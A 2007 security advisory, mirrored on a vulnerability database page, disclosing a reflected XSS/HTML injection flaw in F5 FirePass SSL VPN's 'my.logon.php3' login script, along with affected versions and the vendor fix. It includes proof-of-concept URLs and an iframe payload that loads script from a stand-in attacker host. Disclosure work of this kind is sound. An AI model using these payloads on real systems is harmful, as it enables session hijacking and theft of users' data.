Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18544
HistoryNov 30, 2007 - 12:00 a.m.

PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script

2007-11-3000:00:00
vulners.com
14
JSON

PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script

Date Found: 19th June 2007

Successfully tested on: version 5.5.2

F5 Networks has confirmed the following versions to be vulnerable:

FirePass versions 5.4.1 - 5.5.2
FirePass versions 6.0 - 6.0.1

Description:

F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the "my.logon.php3" server-side script.

No authentication is required to exploit this vulnerability.

Consequences:

An attacker may be able to cause execution of malicious scripting code in the browser of a user who visits a specially-crafted URL to an F5 Firepass device, or visits a malicious page that makes a request to such URL. Such code would run within the security context of the target domain.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e. admin session IDs) to unauthorised third parties.

Proof of concept (PoC) URL:

https://target.tld/my.logon.php3?"></script><textarea>HTML_injection_test</textarea><!--

The payload in the example is

"></script><textarea>HTML_injection_test</textarea><!–

which injects a 'textarea' box

The following PoC HTML page would run JavaScript without any restrictions from a third-party file ('http://www.evil.foo/b&#39; in this case):

<html>

<iframe src="https://target.tld/my.logon.php3?&#37;22&#37;3E&#37;3C/script&#37;3E&#37;3Cscript&#37;3Eeval&#37;28name&#37;29&#37;3C/script&#37;3E&#37;3C&#37;21--&quot; width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b&#39;&#41;&quot;&gt;&lt;/iframe&gt;

</html>

Successfully tested on:

Server environment:

F5 FirePass 4100

Client environment:

Microsoft Internet Explorer 7.0.5730.11

Severity: Medium/High

Author: Richard Brain of ProCheckUp Ltd (www.procheckup.com)

With thanks to Petko D. Petkov for suggesting the eval(name) technique.

References:

http://www.procheckup.com/Vulnerability_2007.php
http://www.f5.com/products/FirePass/

ProCheckUp thanks F5 Networks for working with us.

Fix:

F5 Networks has issued SOL7923:

https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1

JSON